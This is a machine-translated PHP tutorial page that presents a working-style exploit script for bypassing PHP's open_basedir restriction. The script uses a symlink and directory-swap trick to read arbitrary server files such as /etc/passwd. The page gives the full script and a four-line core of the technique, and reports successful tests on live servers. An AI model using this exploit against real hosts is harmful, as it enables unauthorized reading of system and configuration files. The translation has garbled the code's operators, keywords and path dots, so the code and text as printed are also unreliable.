PHP5 Full version Bypass Open_basedir read File Script Vulnerability in detail, _php tutorial

Source: Internet
Author: User
Tags symlink

PHP5 Full version Bypass Open_basedir read File Script vulnerability detailed description,


The vulnerability was raised a long time ago (about 5 years ago), but is not a problem with PHP code, so the problem persists until now. I never noticed, and later Yaseng told me that he had tested it as if he were 5.5.

The vulnerability details are http://cxsecurity.com/issue/WLB-2009110068 here.

Give me the exp I wrote:

Copy CodeThe code is as follows:
<?php
/*
* by Phithon
* FROM http://www.bkjia.com
* detail:http://cxsecurity.com/issue/wlb-2009110068
*/
Header (' Content-type:text/plain ');
Error_reporting (-1);
Ini_set (' display_errors ', TRUE);
printf ("Open_basedir:%s\nphp_version:%s\n", Ini_get (' Open_basedir '), phpversion ());
printf ("Disable_functions:%s\n", Ini_get (' disable_functions '));
$file = str_replace (' \ \ ', '/', isset ($_request[' file '])? $_request[' file ']: '/etc/passwd ');
$relat _file = Getrelativepath (__file__, $file);
$paths = explode ('/', $file);
$name = Mt_rand ()% 999;
$exp = Getrandstr ();
mkdir ($name);
ChDir ($name);
for ($i = 1; $i < count ($paths)-1; $i + +) {
mkdir ($paths [$i]);
ChDir ($paths [$i]);
}
mkdir ($paths [$i]);
for ($i-= 1; $i > 0; $i-) {
ChDir ('.. ');
}
$paths = explode ('/', $relat _file);
$j = 0;
for ($i = 0; $paths [$i] = = '. '; $i + +) {
mkdir ($name);
ChDir ($name);
$j + +;
}
for ($i = 0; $i <= $j; $i + +) {
ChDir ('.. ');
}
$tmp = Array_fill (0, $j + 1, $name);
Symlink (Implode ('/', $tmp), ' Tmplink ');
$tmp = Array_fill (0, $j, ' ... ');
Symlink (' tmplink/'. Implode ('/', $tmp). $file, $exp);
Unlink (' Tmplink ');
mkdir (' Tmplink ');
Delfile ($name);
$exp = dirname ($_server[' script_name '). "/{$exp}";
$exp = "http://{$_server[' server_name ']}{$exp}";
echo "\ n-----------------content---------------\ n \ nthe";
Echo file_get_contents ($EXP);
Delfile (' Tmplink ');

function Getrelativepath ($from, $to) {
Some compatibility fixes for Windows paths
$from = RTrim ($from, '/\ '). '/';
$from = str_replace (' \ \ ', '/', $from);
$to = str_replace (' \ \ ', '/', $to);

$from = explode ('/', $from);
$to = explode ('/', $to);
$relPath = $to;

foreach ($from as $depth = $dir) {
//Find First non-matching dir
if ($dir = = = $to [$depth]) {
//Ignore This directory
Array_shift ($relPath),
} else {
//Get number of remaining dirs to $from
$remaining = Count ($from)-$depth;
if ($remaining > 1) {
//Add traversals to first matching dir
$padLength = (count ($relPath) + $remaining -1) *-1;
$relPath = Array_pad ($relPath, $padLength, ' ... ');
break;
} else {
$relPath [0] = './'. $relPath [0];
}
}
}
Return implode ('/', $relPath);
}

function Delfile ($deldir) {
if (@is_file ($deldir)) {
@chmod ($deldir, 0777);
Return @unlink ($deldir);
}else if (@is_dir ($deldir)) {
if ($mydir = @opendir ($deldir)) = = NULL) return false;
while (false!== ($file = @readdir ($mydir)))
{
$name = File_str ($deldir. ' /'. $file);
if ($file! = ') && ($file! = ' ... ')) {delfile ($name);}
}
@closedir ($mydir);
@chmod ($deldir, 0777);
Return @rmdir ($deldir)? True:false;
}
}

function File_str ($string)
{
return Str_replace ('//', '/', str_replace (' \ \ ', '/', $string));
}

function Getrandstr ($length = 6) {
$chars = ' abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ';
$RANDSTR = ";
for ($i = 0; $i < $length; $i + +) {
$randStr. = substr ($chars, Mt_rand (0, strlen ($chars)-1), 1);
}
return $randStr;
}

If we want to read/etc/passwd. In fact, the principle is to create a link file x, with a relative path to a/a/a/a, and then create a link file exp points to x/. /.. /.. /etc/passwd.

In fact, the point is a/a/a/a/. /.. /.. /ETC/PASSWD, in fact, is./etc/passwd.

This time delete x, then create an X catalog, but exp still points to x/. /.. /.. /ETC/PASSWD, so the success of the cross to/etc/passwd.

The essence is these four sentences:
Copy the Code code as follows:
Symlink ("Abc/abc/abc/abc", "Tmplink");
Symlink ("tmplink/. /.. /.. /etc/passwd "," exploit ");
Unlink ("Tmplink");
mkdir ("Tmplink");

We visit Http://xxx/exp, and if the server supports access to linked files, you can read the/etc/passwd.

There is no action to trigger open_basedir, but the effect is to bypass the Open_basedir to read arbitrary files.

The error is not in PHP, but I do not know who blamed the error, so PHP has not managed this issue.

Open_basedir

Restrict the files that PHP can open to the specified directory tree, including the file itself. This directive is not affected by the open or closed security mode.

When a script tries to open a file with an example of fopen () or Gzopen (), the location of the file is checked. When the file is outside the specified directory tree, PHP will refuse to open it. All symbolic connections are parsed, so it is not possible to circumvent this restriction by symbolic connections.

Special values. Indicates that the working directory of the script will be used as the base directory. But this is a bit risky because the working directory of the script can easily be changed by ChDir ().

In the httpd.conf file, Open_basedir can be turned off, like any other configuration option, with "Php_admin_value open_basedir none" (for example, in some virtual hosts).

In Windows, separate the directories with semicolons. Separate the directories with colons in any other system. As an Apache module, the Open_basedir path in the parent directory is automatically inherited.

The limit specified with Open_basedir is actually a prefix, not a directory name. This means "Open_basedir =/dir/incl" also allows access to "/dir/include" and "/dir/incls" if they exist. If you want to restrict access to only the specified directory, end the path name with a slash. For example: "Open_basedir =/dir/incl/".

Note:

Support for multiple directories is 3.0.7 joined.

By default, all files are allowed to open.

I tested it on my VPS (php5.3.28 + nginx) and Raspberry Pi (php 5.4.4 + nginx) and read it successfully.

Raspberry Pi Test:

Compared to the 5.3 xml that hole (that many files can not read), the success rate is still relatively stable, many files are readable. And the version is not required, the harm is relatively large.

A few days ago letter's CTF, tried the next script, Apache can also read, at that time read read Kali machine/etc/httpd/conf/httpd.conf, no what harvest.

Found no side station, traffic is forwarded through the gateway.

http://www.bkjia.com/PHPjc/945716.html www.bkjia.com true http://www.bkjia.com/PHPjc/945716.html techarticle PHP5 full version bypass Open_basedir read File Script vulnerability detailed description, the vulnerability long ago (about 5 years ago) was raised, but not PHP code problems, so the problem persists ...

  • Related Article

    Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.